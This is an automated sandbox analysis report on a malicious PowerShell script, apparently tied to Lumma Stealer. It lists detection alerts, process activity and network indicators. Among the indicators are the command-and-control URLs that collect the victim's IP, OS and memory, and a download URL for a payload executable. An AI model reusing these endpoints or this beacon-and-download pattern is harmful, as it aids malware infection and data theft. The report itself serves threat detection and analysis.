Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XkgoE6Yb52.ps1

Overview

General Information

Sample name:XkgoE6Yb52.ps1
renamed because original name is a hash value
Original sample name:042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635.ps1
Analysis ID:1617748
MD5:ec5ea6c135974c85204bd38525329e5b
SHA1:131f8dfd360bf7fffbbff91f264f0664c72b724c
SHA256:042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635
Tags:91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

Score:76
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 6364 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3328, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", ProcessId: 6808, ProcessName: powershell.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\analytics[1].js
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3328, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", ProcessId: 6808, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:29:06.738323+010020216971A Network Trojan was detected192.168.2.449733185.211.7.193443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:29:08.328516+010028032742Potentially Bad Traffic192.168.2.44973791.206.178.1205001TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:29:05.575867+010028602321Malware Command and Control Activity Detected192.168.2.44973291.206.178.1205001TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:29:05.588539+010028602331Malware Command and Control Activity Detected91.206.178.1205001192.168.2.449732TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:29:03.230549+010018100002Potentially Bad Traffic192.168.2.449731104.26.13.20580TCP
2025-02-18T08:29:05.575867+010018100002Potentially Bad Traffic192.168.2.44973291.206.178.1205001TCP
2025-02-18T08:29:06.738323+010018100002Potentially Bad Traffic192.168.2.449733185.211.7.193443TCP
2025-02-18T08:29:08.328516+010018100002Potentially Bad Traffic192.168.2.44973791.206.178.1205001TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://91.206.178.120:5001Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=$randomNumberAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exeAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=MicrosoftAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$raAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=33884$MnlAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=33884Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/pAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: XkgoE6Yb52.ps1Virustotal: Detection: 16%Perma Link
Source: XkgoE6Yb52.ps1ReversingLabs: Detection: 13%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
Source: unknownHTTPS traffic detected: 185.211.7.193:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.4:49734 version: TLS 1.2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.4:49732 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.4:49733 -> 185.211.7.193:443
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49737
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 91.206.178.120:5001
Source: global trafficTCP traffic: 192.168.2.4:65198 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 104.26.13.205:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49737 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49733 -> 185.211.7.193:443
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/header-footer/images/NoteTick.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: goutteuy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: maxcdn.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_end?random_number=33884 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/header-footer/images/NoteTick.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: goutteuy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: maxcdn.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_end?random_number=33884 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: goutteuy.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Fri, 07 Jan 2022 09:51:35 GMTetag: "999-61d80d27-4ab5739bf7ac3281;;;"accept-ranges: bytescontent-length: 2457date: Tue, 18 Feb 2025 07:29:06 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=33884
Source: powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=33884$Mnl
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.1821221013.0000000007A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: bootstrap.min[1].css.0.drString found in binary or memory: http://getbootstrap.com)
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
Source: analytics[1].js.0.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:225:0
Source: powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:225:0
Source: powershell.exe, 00000000.00000002.1823460527.00000000089B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family
Source: powershell.exe, 00000000.00000002.1816712031.0000000003231000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000000.00000002.1821019175.000000000796E000.00000004.00000020.00020000.00000000.sdmp, css[1].css.0.drString found in binary or memory: https://fonts.gstatic.com/l/font?kit=memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY&ske
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: bootstrap.min[1].css.0.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: powershell.exe, 00000000.00000002.1817520392.0000000005B55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1817520392.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goutteuy.com
Source: powershell.exe, 00000000.00000002.1817520392.0000000005708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goutteuy.com/wp-content/p
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1String found in binary or memory: https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exe
Source: powershell.exe, 00000000.00000002.1823460527.00000000089B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000000.00000002.1822987917.00000000088E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/
Source: powershell.exe, 00000000.00000002.1816712031.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css#
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssS
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssl
Source: powershell.exe, 00000000.00000002.1822729964.0000000008880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/l
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: analytics[1].js.0.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: analytics[1].js.0.drString found in binary or memory: https://tagassistant.google.com/
Source: powershell.exe, 00000000.00000002.1816712031.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/
Source: powershell.exe, 00000000.00000002.1816712031.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/:
Source: powershell.exe, 00000000.00000002.1823052796.0000000008911000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: powershell.exe, 00000000.00000002.1823460527.00000000089C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js.
Source: powershell.exe, 00000000.00000002.1823052796.0000000008952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsK
Source: powershell.exe, 00000000.00000002.1823052796.0000000008911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsWC:
Source: powershell.exe, 00000000.00000002.1823052796.0000000008952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsn
Source: analytics[1].js.0.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
Source: analytics[1].js.0.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: analytics[1].js.0.drString found in binary or memory: https://www.google.%/ads/ga-audiences
Source: analytics[1].js.0.drString found in binary or memory: https://www.google.com/ads/ga-audiences
Source: analytics[1].js.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 185.211.7.193:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0516E3F20_2_0516E3F2
Source: classification engineClassification label: mal76.troj.winPS1@3/10@3/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bootstrap.min[1].cssJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mublfckf.cf0.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: XkgoE6Yb52.ps1Virustotal: Detection: 16%
Source: XkgoE6Yb52.ps1ReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
